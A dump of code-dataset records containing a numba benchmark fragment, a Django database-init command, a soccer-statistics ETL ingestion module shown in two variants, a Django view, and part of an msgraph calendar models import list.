'float': 0.5,
'complex': 0.5 + 1.0j,
'array_1d': np.zeros(10, dtype=np.int64),
'array_3d': np.zeros(20, dtype=np.float64).reshape(2, 2, 5),
'array_records': np.zeros(10, dtype=rec_dtype),
'recarray': np.recarray(10, dtype=rec_dtype),
'tuple': (0.5, 1.0j, ()),
'record': np.empty(1, dtype=rec_dtype)[0],
'bytearray': bytearray(3),
}
def setup():
from numba import jit
global binary, binary_pyobj, unary_default
@jit(nopython=True)
def binary(x, y):
pass
@jit(forceobj=True)
def binary_pyobj(x, y):
pass
@jit(nopython=True)
def unary_default(x=None):
pass
for tp in samples.values():
binary(tp, tp)
binary_pyobj(object(), object())
unary_default()
class NoPythonDispatch:
@classmethod
def generate_benchmarks(cls, names):
for name in names:
def timefunc(self, arg=samples[name]):
func = binary
for i in range(1000):
func(arg, arg)
timefunc.__name__ = "time_dispatch_" + name
setattr(cls, timefunc.__name__, timefunc)
def time_dispatch_defaults(self):
unary_default()
NoPythonDispatch.generate_benchmarks(samples.keys())
class PyObjectDispatch:
def time_dispatch_pyobject(self):
x = object()
for i in range(1000):
binary_pyobj(x, x)
| true | true |
1c304943b771fde4e13df8b6570f2d00195a8af1 | 425 | py | Python | chat/management/commands/init_db.py | moustaphacheikh/pychat | 05a8b255efda03840a9ce8d39a9ee1d38b87ea67 | [
"MIT"
] | null | null | null | chat/management/commands/init_db.py | moustaphacheikh/pychat | 05a8b255efda03840a9ce8d39a9ee1d38b87ea67 | [
"MIT"
] | null | null | null | chat/management/commands/init_db.py | moustaphacheikh/pychat | 05a8b255efda03840a9ce8d39a9ee1d38b87ea67 | [
"MIT"
] | null | null | null | __author__ = 'andrew'
from django.core.management import call_command, BaseCommand
class Command(BaseCommand):
help = 'Creates the database'
def handle(self, *args, **options):
#Django 1.6 South
#python manage.py schemamigration chat $1 --initial
#python manage.py syncdb --all
#python manage.py migrate --fake
call_command('makemigrations', 'chat')
call_command('migrate', 'auth')
# call_command('syncdb') | 28.333333 | 60 | 0.731765 | __author__ = 'andrew'
from django.core.management import call_command, BaseCommand
class Command(BaseCommand):
help = 'Creates the database'
def handle(self, *args, **options):
call_command('makemigrations', 'chat')
call_command('migrate', 'auth')
| true | true |
1c304975a7a8fa4927bdb739b63ca2b5b5170682 | 12,149 | py | Python | marcottimls/etl/statistics.py | soccermetrics/marcotti-mls | 84c6d0d619c1a0c70dc6602074a3c5227959803c | [
"MIT"
] | 3 | 2016-08-04T10:34:01.000Z | 2019-03-05T23:22:06.000Z | marcottimls/etl/statistics.py | soccermetrics/marcotti-mls | 84c6d0d619c1a0c70dc6602074a3c5227959803c | [
"MIT"
] | null | null | null | marcottimls/etl/statistics.py | soccermetrics/marcotti-mls | 84c6d0d619c1a0c70dc6602074a3c5227959803c | [
"MIT"
] | null | null | null | import logging
from marcottimls.etl.base import SeasonalDataIngest
from marcottimls.models import *
logger = logging.getLogger(__name__)
class PlayerMinuteIngest(SeasonalDataIngest):
"""
Ingestion methods for data files containing player minutes.
"""
BATCH_SIZE = 50
def parse_file(self, rows):
inserts = 0
insertion_list = []
logger.info("Ingesting Player Minutes...")
for keys in rows:
competition_name = self.column_unicode("Competition", **keys)
season_name = self.column("Season", **keys)
club_symbol = self.column("Club Symbol", **keys)
last_name = self.column_unicode("Last Name", **keys)
first_name = self.column_unicode("First Name", **keys)
total_minutes = self.column_int("Mins", **keys)
competition_id = self.get_id(Competitions, name=competition_name)
if competition_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Competition {} not in database".format(first_name, last_name, competition_name))
continue
season_id = self.get_id(Seasons, name=season_name)
if season_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Season {} not in database".format(first_name, last_name, season_name))
continue
club_id = self.get_id(Clubs, symbol=club_symbol)
if club_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Club {} not in database".format(first_name, last_name, club_symbol))
continue
player_id = self.get_player_from_name(first_name, last_name)
if player_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Player not in database".format(first_name, last_name))
continue
stat_dict = self.prepare_db_dict(
['player_id', 'club_id', 'competition_id', 'season_id', 'minutes'],
[player_id, club_id, competition_id, season_id, total_minutes])
if not self.record_exists(FieldPlayerStats, **stat_dict):
insertion_list.append(FieldPlayerStats(**stat_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, PlayerMinuteIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Player Minutes records inserted and committed to database".format(inserts))
logger.info("Player Minutes Ingestion complete.")
class MatchStatIngest(SeasonalDataIngest):
"""
Ingestion methods for data files containing season statistics.
Assume categories and nomenclature of Nielsen soccer database.
"""
@staticmethod
def is_empty_record(*args):
"""Check for sparseness of statistical record.
If all quantities of a statistical record are empty, return True.
If at least one quantity of statistical record is not empty, return False.
:param args: list of elements
:return: boolean that expresses (non-)sparseness of list
"""
return not any(arg for arg in args)
@staticmethod
def empty_ids(*args):
"""
Check for undefined database IDs in a list.
If any of the IDs are undefined (None), return True.
If all of the IDs are defined (not None), return False.
:param args: list of elements
:return: boolean that expresses presence of undefined elements
"""
return any(arg is None for arg in args)
def get_common_stats(self, **keys):
last_name = self.column_unicode("Last Name", **keys)
first_name = self.column_unicode("First Name", **keys)
club_name = self.column_unicode("Club", **keys)
competition_name = self.column_unicode("Competition", **keys)
start_year = self.column_int("Year1", **keys)
end_year = self.column_int("Year2", **keys)
match_appearances = self.column_int("Gp", **keys)
matches_subbed = self.column_int("Sb", **keys)
total_minutes = self.column_int("Min", **keys)
yellow_cards = self.column_int("Yc", **keys)
red_cards = self.column_int("Rc", **keys)
player_id = self.get_player_from_name(first_name, last_name)
club_id = self.get_id(Clubs, name=club_name)
competition_id = self.get_id(Competitions, name=competition_name)
season_name = "{}".format(start_year) if start_year == end_year else "{}-{}".format(start_year, end_year)
season_id = self.get_id(Seasons, name=season_name)
if self.empty_ids(player_id, club_id, competition_id, season_id):
raise ValueError("At least one of Player/Club/Competition/Season IDs is empty. Skipping insert")
stat_dict = self.prepare_db_dict(
['player_id', 'club_id', 'competition_id', 'season_id', 'appearances',
'substituted', 'minutes', 'yellows', 'reds'],
[player_id, club_id, competition_id, season_id, match_appearances,
matches_subbed, total_minutes, yellow_cards, red_cards])
return stat_dict
def parse_file(self, rows):
raise NotImplementedError
class FieldStatIngest(MatchStatIngest):
BATCH_SIZE = 500
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
common_stat_dict = self.get_common_stats(**keys)
except ValueError as err:
logger.error(err.message)
continue
total_goals = self.column_int("Gl", **keys)
headed_goals = self.column_int("Hd", **keys)
freekick_goals = self.column_int("Fk", **keys)
in_box_goals = self.column_int("In", **keys)
out_box_goals = self.column_int("Out", **keys)
game_winning_goals = self.column_int("Gw", **keys)
penalty_goals = self.column_int("Pn", **keys)
total_penalties = self.column_int("Pa", **keys)
assists = self.column_int("As", **keys)
deadball_assists = self.column_int("Dd", **keys)
shots = self.column_int("Sht", **keys)
fouls = self.column_int("Fls", **keys)
field_stat_dict = self.prepare_db_dict(
['goals_total', 'goals_headed', 'goals_freekick', 'goals_in_area', 'goals_out_area',
'goals_winners', 'goals_penalty', 'penalties_taken', 'assists_total', 'assists_deadball',
'shots_total', 'fouls_total'],
[total_goals, headed_goals, freekick_goals, in_box_goals, out_box_goals,
game_winning_goals, penalty_goals, total_penalties, assists, deadball_assists,
shots, fouls]
)
field_stat_dict.update(common_stat_dict)
if field_stat_dict is not None:
if not self.record_exists(FieldPlayerStats, **field_stat_dict):
insertion_list.append(FieldPlayerStats(**field_stat_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, FieldStatIngest.BATCH_SIZE)
inserts += inserted
if inserted and not inserts % FieldStatIngest.BATCH_SIZE:
logger.info("{} records inserted".format(inserts))
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Field Player Statistics records inserted and committed to database".format(inserts))
logger.info("Field Player Statistics Ingestion complete.")
class GoalkeeperStatIngest(MatchStatIngest):
BATCH_SIZE = 50
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
common_stat_dict = self.get_common_stats(**keys)
except ValueError as err:
logger.error(err.message)
continue
wins = self.column_int("Wn", **keys)
draws = self.column_int("Dr", **keys)
losses = self.column_int("Ls", **keys)
goals_allowed = self.column_int("Ga", **keys)
clean_sheets = self.column_int("Cs", **keys)
shots_allowed = self.column_int("Sht", **keys)
gk_stat_dict = self.prepare_db_dict(
['wins', 'draws', 'losses', 'goals_allowed', 'shots_allowed', 'clean_sheets'],
[wins, draws, losses, goals_allowed, shots_allowed, clean_sheets]
)
gk_stat_dict.update(common_stat_dict)
if gk_stat_dict is not None:
if not self.record_exists(GoalkeeperStats, **gk_stat_dict):
stat_record = GoalkeeperStats(**gk_stat_dict)
insertion_list.append(stat_record)
inserted, insertion_list = self.bulk_insert(insertion_list, GoalkeeperStatIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Goalkeeper Statistics records inserted and committed to database".format(inserts))
logger.info("Goalkeeper Statistics Ingestion complete.")
class LeaguePointIngest(SeasonalDataIngest):
    """Ingests season league-point totals (games played, points) per club."""

    # Number of pending records per bulk insert flush.
    BATCH_SIZE = 10

    def parse_file(self, rows):
        """Parse league point rows and insert new LeaguePoints records.

        :param rows: iterable of dict-like CSV rows keyed by column header.
        """
        inserts = 0
        insertion_list = []
        for keys in rows:
            # Club may be identified by symbol, full name, or both; a missing
            # column is tolerated and simply excluded from the lookup below.
            try:
                club_symbol = self.column("Club Symbol", **keys)
            except KeyError:
                club_symbol = None
            try:
                club_name = self.column_unicode("Club", **keys)
            except KeyError:
                club_name = None
            competition_name = self.column_unicode("Competition", **keys)
            season_name = self.column("Season", **keys)
            matches_played = self.column_int("GP", **keys)
            points = self.column_int("Pts", **keys)
            # Resolve the three foreign keys; skip the row (with an error
            # log) if any of them cannot be found in the database.
            competition_id = self.get_id(Competitions, name=competition_name)
            if competition_id is None:
                logger.error(u"Cannot insert LeaguePoint record: "
                             u"Competition {} not in database".format(competition_name))
                continue
            season_id = self.get_id(Seasons, name=season_name)
            if season_id is None:
                logger.error(u"Cannot insert LeaguePoint record: "
                             u"Season {} not in database".format(season_name))
                continue
            # Build the club lookup from only the fields that were present.
            club_dict = {field: value for (field, value)
                         in zip(['name', 'symbol'], [club_name, club_symbol])
                         if value is not None}
            club_id = self.get_id(Clubs, **club_dict)
            if club_id is None:
                logger.error(u"Cannot insert LeaguePoint record: "
                             u"Database error involving {}".format(club_dict))
                continue
            # One record per (club, competition, season); skip duplicates.
            club_season_dict = dict(club_id=club_id, competition_id=competition_id, season_id=season_id)
            if not self.record_exists(LeaguePoints, **club_season_dict):
                point_record_dict = dict(played=matches_played, points=points)
                point_record_dict.update(club_season_dict)
                insertion_list.append(LeaguePoints(**point_record_dict))
                inserted, insertion_list = self.bulk_insert(insertion_list, LeaguePointIngest.BATCH_SIZE)
                inserts += inserted
        # Flush any remaining records below the batch threshold.
        self.session.add_all(insertion_list)
        self.session.commit()
        inserts += len(insertion_list)
        logger.info("Total {} League Point records inserted and committed to database".format(inserts))
        logger.info("League Point Ingestion complete.")
| 44.339416 | 114 | 0.610009 | import logging
from marcottimls.etl.base import SeasonalDataIngest
from marcottimls.models import *
logger = logging.getLogger(__name__)
class PlayerMinuteIngest(SeasonalDataIngest):
    """Ingests per-season player minutes-played rows into FieldPlayerStats."""

    # Number of pending records per bulk insert flush.
    BATCH_SIZE = 50

    def parse_file(self, rows):
        """Parse player minute rows and bulk-insert new FieldPlayerStats records.

        :param rows: iterable of dict-like CSV rows keyed by column header.
        """
        inserts = 0
        insertion_list = []
        logger.info("Ingesting Player Minutes...")
        for keys in rows:
            competition_name = self.column_unicode("Competition", **keys)
            season_name = self.column("Season", **keys)
            club_symbol = self.column("Club Symbol", **keys)
            last_name = self.column_unicode("Last Name", **keys)
            first_name = self.column_unicode("First Name", **keys)
            total_minutes = self.column_int("Mins", **keys)
            # Resolve all four foreign keys; skip the row (with an error log)
            # if any of them cannot be found in the database.
            competition_id = self.get_id(Competitions, name=competition_name)
            if competition_id is None:
                logger.error(u"Cannot insert Player Minutes record for {} {}: "
                             u"Competition {} not in database".format(first_name, last_name, competition_name))
                continue
            season_id = self.get_id(Seasons, name=season_name)
            if season_id is None:
                logger.error(u"Cannot insert Player Minutes record for {} {}: "
                             u"Season {} not in database".format(first_name, last_name, season_name))
                continue
            club_id = self.get_id(Clubs, symbol=club_symbol)
            if club_id is None:
                logger.error(u"Cannot insert Player Minutes record for {} {}: "
                             u"Club {} not in database".format(first_name, last_name, club_symbol))
                continue
            player_id = self.get_player_from_name(first_name, last_name)
            if player_id is None:
                logger.error(u"Cannot insert Player Minutes record for {} {}: "
                             u"Player not in database".format(first_name, last_name))
                continue
            stat_dict = self.prepare_db_dict(
                ['player_id', 'club_id', 'competition_id', 'season_id', 'minutes'],
                [player_id, club_id, competition_id, season_id, total_minutes])
            # Robustness/consistency fix: the sibling ingest classes guard
            # against prepare_db_dict() returning None before dereferencing
            # it; this class previously dereferenced it unconditionally.
            if stat_dict is not None and not self.record_exists(FieldPlayerStats, **stat_dict):
                insertion_list.append(FieldPlayerStats(**stat_dict))
                inserted, insertion_list = self.bulk_insert(insertion_list, PlayerMinuteIngest.BATCH_SIZE)
                inserts += inserted
        # Flush any remaining records below the batch threshold.
        self.session.add_all(insertion_list)
        self.session.commit()
        inserts += len(insertion_list)
        logger.info("Total {} Player Minutes records inserted and committed to database".format(inserts))
        logger.info("Player Minutes Ingestion complete.")
class MatchStatIngest(SeasonalDataIngest):
    """Base class for player match-statistic ingestion sheets.

    Provides the column extraction and foreign-key resolution shared by the
    field-player and goalkeeper stat ingesters.
    """

    @staticmethod
    def is_empty_record(*args):
        """Return True when every supplied field value is falsy."""
        return all(not field for field in args)

    @staticmethod
    def empty_ids(*args):
        """Return True when at least one of the supplied IDs is None."""
        return any(record_id is None for record_id in args)

    def get_common_stats(self, **keys):
        """Extract the statistics common to all match stat sheets.

        Resolves the player, club, competition, and season foreign keys and
        returns a DB-ready dict of common fields.

        :param keys: dict-like CSV row keyed by column header.
        :raises ValueError: if any of the four foreign-key IDs is missing.
        """
        first_name = self.column_unicode("First Name", **keys)
        last_name = self.column_unicode("Last Name", **keys)
        club_name = self.column_unicode("Club", **keys)
        competition_name = self.column_unicode("Competition", **keys)
        start_year = self.column_int("Year1", **keys)
        end_year = self.column_int("Year2", **keys)
        match_appearances = self.column_int("Gp", **keys)
        matches_subbed = self.column_int("Sb", **keys)
        total_minutes = self.column_int("Min", **keys)
        yellow_cards = self.column_int("Yc", **keys)
        red_cards = self.column_int("Rc", **keys)

        # Single-year seasons are named "YYYY"; split seasons "YYYY-YYYY".
        if start_year == end_year:
            season_name = "{}".format(start_year)
        else:
            season_name = "{}-{}".format(start_year, end_year)

        player_id = self.get_player_from_name(first_name, last_name)
        club_id = self.get_id(Clubs, name=club_name)
        competition_id = self.get_id(Competitions, name=competition_name)
        season_id = self.get_id(Seasons, name=season_name)
        if self.empty_ids(player_id, club_id, competition_id, season_id):
            raise ValueError("At least one of Player/Club/Competition/Season IDs is empty. Skipping insert")
        return self.prepare_db_dict(
            ['player_id', 'club_id', 'competition_id', 'season_id', 'appearances',
             'substituted', 'minutes', 'yellows', 'reds'],
            [player_id, club_id, competition_id, season_id, match_appearances,
             matches_subbed, total_minutes, yellow_cards, red_cards])

    def parse_file(self, rows):
        """Subclasses must implement row parsing for their stat sheet type."""
        raise NotImplementedError
class FieldStatIngest(MatchStatIngest):
    """Ingests per-season field (outfield) player statistics into FieldPlayerStats."""

    # Number of pending records per bulk insert flush.
    BATCH_SIZE = 500

    def parse_file(self, rows):
        """Parse field player stat rows and bulk-insert new FieldPlayerStats records.

        :param rows: iterable of dict-like CSV rows keyed by column header.
        """
        inserts = 0
        insertion_list = []
        for keys in rows:
            try:
                common_stat_dict = self.get_common_stats(**keys)
            except ValueError as err:
                # str(err) is portable; err.message was removed in Python 3
                # and would itself raise AttributeError there.
                logger.error(str(err))
                continue
            total_goals = self.column_int("Gl", **keys)
            headed_goals = self.column_int("Hd", **keys)
            freekick_goals = self.column_int("Fk", **keys)
            in_box_goals = self.column_int("In", **keys)
            out_box_goals = self.column_int("Out", **keys)
            game_winning_goals = self.column_int("Gw", **keys)
            penalty_goals = self.column_int("Pn", **keys)
            total_penalties = self.column_int("Pa", **keys)
            assists = self.column_int("As", **keys)
            deadball_assists = self.column_int("Dd", **keys)
            shots = self.column_int("Sht", **keys)
            fouls = self.column_int("Fls", **keys)
            field_stat_dict = self.prepare_db_dict(
                ['goals_total', 'goals_headed', 'goals_freekick', 'goals_in_area', 'goals_out_area',
                 'goals_winners', 'goals_penalty', 'penalties_taken', 'assists_total', 'assists_deadball',
                 'shots_total', 'fouls_total'],
                [total_goals, headed_goals, freekick_goals, in_box_goals, out_box_goals,
                 game_winning_goals, penalty_goals, total_penalties, assists, deadball_assists,
                 shots, fouls]
            )
            # Guard BEFORE mutating: the original tested for None only after
            # calling .update(), by which point a None result would already
            # have raised AttributeError.
            if field_stat_dict is not None:
                field_stat_dict.update(common_stat_dict)
                if not self.record_exists(FieldPlayerStats, **field_stat_dict):
                    insertion_list.append(FieldPlayerStats(**field_stat_dict))
                    inserted, insertion_list = self.bulk_insert(insertion_list, FieldStatIngest.BATCH_SIZE)
                    inserts += inserted
                    # Periodic progress logging, once per flushed batch.
                    if inserted and not inserts % FieldStatIngest.BATCH_SIZE:
                        logger.info("{} records inserted".format(inserts))
        # Flush any remaining records below the batch threshold.
        self.session.add_all(insertion_list)
        self.session.commit()
        inserts += len(insertion_list)
        logger.info("Total {} Field Player Statistics records inserted and committed to database".format(inserts))
        logger.info("Field Player Statistics Ingestion complete.")
class GoalkeeperStatIngest(MatchStatIngest):
    """Ingests per-season goalkeeper statistics rows into GoalkeeperStats."""

    # Number of pending records per bulk insert flush.
    BATCH_SIZE = 50

    def parse_file(self, rows):
        """Parse goalkeeper stat rows and bulk-insert new GoalkeeperStats records.

        :param rows: iterable of dict-like CSV rows keyed by column header.
        """
        inserts = 0
        insertion_list = []
        for keys in rows:
            try:
                common_stat_dict = self.get_common_stats(**keys)
            except ValueError as err:
                # NOTE(review): err.message exists only on Python 2; on
                # Python 3 this line itself raises AttributeError.
                logger.error(err.message)
                continue
            wins = self.column_int("Wn", **keys)
            draws = self.column_int("Dr", **keys)
            losses = self.column_int("Ls", **keys)
            goals_allowed = self.column_int("Ga", **keys)
            clean_sheets = self.column_int("Cs", **keys)
            shots_allowed = self.column_int("Sht", **keys)
            gk_stat_dict = self.prepare_db_dict(
                ['wins', 'draws', 'losses', 'goals_allowed', 'shots_allowed', 'clean_sheets'],
                [wins, draws, losses, goals_allowed, shots_allowed, clean_sheets]
            )
            gk_stat_dict.update(common_stat_dict)
            # NOTE(review): this None check is vacuous -- had prepare_db_dict()
            # returned None, the .update() call above would already have raised
            # AttributeError. The guard belongs before the update.
            if gk_stat_dict is not None:
                if not self.record_exists(GoalkeeperStats, **gk_stat_dict):
                    stat_record = GoalkeeperStats(**gk_stat_dict)
                    insertion_list.append(stat_record)
                    inserted, insertion_list = self.bulk_insert(insertion_list, GoalkeeperStatIngest.BATCH_SIZE)
                    inserts += inserted
        # Flush any remaining records below the batch threshold.
        self.session.add_all(insertion_list)
        self.session.commit()
        inserts += len(insertion_list)
        logger.info("Total {} Goalkeeper Statistics records inserted and committed to database".format(inserts))
        logger.info("Goalkeeper Statistics Ingestion complete.")
class LeaguePointIngest(SeasonalDataIngest):
    """Ingests season league standings (games played, points) per club."""

    # Number of pending records per bulk insert flush.
    BATCH_SIZE = 10

    def parse_file(self, rows):
        """Parse league point rows and insert new LeaguePoints records.

        :param rows: iterable of dict-like CSV rows keyed by column header.
        """
        inserts = 0
        insertion_list = []
        for row in rows:
            # Club identification columns are optional; absent ones are
            # simply left out of the lookup.
            try:
                club_symbol = self.column("Club Symbol", **row)
            except KeyError:
                club_symbol = None
            try:
                club_name = self.column_unicode("Club", **row)
            except KeyError:
                club_name = None
            competition_name = self.column_unicode("Competition", **row)
            season_name = self.column("Season", **row)
            matches_played = self.column_int("GP", **row)
            points = self.column_int("Pts", **row)

            competition_id = self.get_id(Competitions, name=competition_name)
            if competition_id is None:
                logger.error(u"Cannot insert LeaguePoint record: "
                             u"Competition {} not in database".format(competition_name))
                continue
            season_id = self.get_id(Seasons, name=season_name)
            if season_id is None:
                logger.error(u"Cannot insert LeaguePoint record: "
                             u"Season {} not in database".format(season_name))
                continue

            club_lookup = {}
            if club_name is not None:
                club_lookup['name'] = club_name
            if club_symbol is not None:
                club_lookup['symbol'] = club_symbol
            club_id = self.get_id(Clubs, **club_lookup)
            if club_id is None:
                logger.error(u"Cannot insert LeaguePoint record: "
                             u"Database error involving {}".format(club_lookup))
                continue

            # One record per (club, competition, season); skip duplicates.
            foreign_keys = dict(club_id=club_id, competition_id=competition_id, season_id=season_id)
            if not self.record_exists(LeaguePoints, **foreign_keys):
                record_fields = dict(played=matches_played, points=points, **foreign_keys)
                insertion_list.append(LeaguePoints(**record_fields))
                inserted, insertion_list = self.bulk_insert(insertion_list, LeaguePointIngest.BATCH_SIZE)
                inserts += inserted
        # Flush whatever remains below the batch threshold.
        self.session.add_all(insertion_list)
        self.session.commit()
        inserts += len(insertion_list)
        logger.info("Total {} League Point records inserted and committed to database".format(inserts))
        logger.info("League Point Ingestion complete.")
| true | true |
1c3049775724c20b93d2f960b2c315767c18f81b | 107 | py | Python | ChillProger/views.py | PhillKroger/ChillProger | 238348e83f199c6591a75cefec9591d977712a14 | [
"MIT"
] | null | null | null | ChillProger/views.py | PhillKroger/ChillProger | 238348e83f199c6591a75cefec9591d977712a14 | [
"MIT"
] | null | null | null | ChillProger/views.py | PhillKroger/ChillProger | 238348e83f199c6591a75cefec9591d977712a14 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def home_view(request):
    """Render the site's main landing page template."""
    return render(request, 'main/main.html')
def home_view(request):
    """Render the site's main landing page template."""
    return render(request, 'main/main.html')
1c304a7ff78d7adceaada5123ee020405468e918 | 39,477 | py | Python | msgraph-cli-extensions/beta/calendar_beta/azext_calendar_beta/vendored_sdks/calendar/models/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/beta/calendar_beta/azext_calendar_beta/vendored_sdks/calendar/models/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/beta/calendar_beta/azext_calendar_beta/vendored_sdks/calendar/models/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import CollectionOfAttachment
from ._models_py3 import CollectionOfAttachment0
from ._models_py3 import CollectionOfAttachment1
from ._models_py3 import CollectionOfAttachment10
from ._models_py3 import CollectionOfAttachment2
from ._models_py3 import CollectionOfAttachment3
from ._models_py3 import CollectionOfAttachment4
from ._models_py3 import CollectionOfAttachment5
from ._models_py3 import CollectionOfAttachment6
from ._models_py3 import CollectionOfAttachment7
from ._models_py3 import CollectionOfAttachment8
from ._models_py3 import CollectionOfAttachment9
from ._models_py3 import CollectionOfCalendar
from ._models_py3 import CollectionOfCalendar0
from ._models_py3 import CollectionOfCalendarGroup
from ._models_py3 import CollectionOfCalendarPermission
from ._models_py3 import CollectionOfCalendarPermission0
from ._models_py3 import CollectionOfCalendarPermission1
from ._models_py3 import CollectionOfCalendarPermission2
from ._models_py3 import CollectionOfCalendarPermission3
from ._models_py3 import CollectionOfCalendarPermission4
from ._models_py3 import CollectionOfCalendarPermission5
from ._models_py3 import CollectionOfCalendarPermission6
from ._models_py3 import CollectionOfEvent
from ._models_py3 import CollectionOfEvent0
from ._models_py3 import CollectionOfEvent1
from ._models_py3 import CollectionOfEvent10
from ._models_py3 import CollectionOfEvent11
from ._models_py3 import CollectionOfEvent12
from ._models_py3 import CollectionOfEvent13
from ._models_py3 import CollectionOfEvent14
from ._models_py3 import CollectionOfEvent15
from ._models_py3 import CollectionOfEvent16
from ._models_py3 import CollectionOfEvent17
from ._models_py3 import CollectionOfEvent18
from ._models_py3 import CollectionOfEvent19
from ._models_py3 import CollectionOfEvent2
from ._models_py3 import CollectionOfEvent20
from ._models_py3 import CollectionOfEvent21
from ._models_py3 import CollectionOfEvent22
from ._models_py3 import CollectionOfEvent23
from ._models_py3 import CollectionOfEvent24
from ._models_py3 import CollectionOfEvent25
from ._models_py3 import CollectionOfEvent26
from ._models_py3 import CollectionOfEvent27
from ._models_py3 import CollectionOfEvent28
from ._models_py3 import CollectionOfEvent29
from ._models_py3 import CollectionOfEvent3
from ._models_py3 import CollectionOfEvent30
from ._models_py3 import CollectionOfEvent31
from ._models_py3 import CollectionOfEvent32
from ._models_py3 import CollectionOfEvent33
from ._models_py3 import CollectionOfEvent34
from ._models_py3 import CollectionOfEvent35
from ._models_py3 import CollectionOfEvent36
from ._models_py3 import CollectionOfEvent37
from ._models_py3 import CollectionOfEvent38
from ._models_py3 import CollectionOfEvent39
from ._models_py3 import CollectionOfEvent4
from ._models_py3 import CollectionOfEvent40
from ._models_py3 import CollectionOfEvent41
from ._models_py3 import CollectionOfEvent42
from ._models_py3 import CollectionOfEvent5
from ._models_py3 import CollectionOfEvent6
from ._models_py3 import CollectionOfEvent7
from ._models_py3 import CollectionOfEvent8
from ._models_py3 import CollectionOfEvent9
from ._models_py3 import CollectionOfExtension
from ._models_py3 import CollectionOfExtension0
from ._models_py3 import CollectionOfExtension1
from ._models_py3 import CollectionOfExtension10
from ._models_py3 import CollectionOfExtension2
from ._models_py3 import CollectionOfExtension3
from ._models_py3 import CollectionOfExtension4
from ._models_py3 import CollectionOfExtension5
from ._models_py3 import CollectionOfExtension6
from ._models_py3 import CollectionOfExtension7
from ._models_py3 import CollectionOfExtension8
from ._models_py3 import CollectionOfExtension9
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty9
from ._models_py3 import CollectionOfPlace
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty9
from ._models_py3 import MicrosoftGraphAttachment
from ._models_py3 import MicrosoftGraphAttendee
from ._models_py3 import MicrosoftGraphAttendeeBase
from ._models_py3 import MicrosoftGraphCalendar
from ._models_py3 import MicrosoftGraphCalendarGroup
from ._models_py3 import MicrosoftGraphCalendarPermission
from ._models_py3 import MicrosoftGraphDateTimeZone
from ._models_py3 import MicrosoftGraphEmailAddress
from ._models_py3 import MicrosoftGraphEntity
from ._models_py3 import MicrosoftGraphEvent
from ._models_py3 import MicrosoftGraphExtension
from ._models_py3 import MicrosoftGraphItemBody
from ._models_py3 import MicrosoftGraphLocation
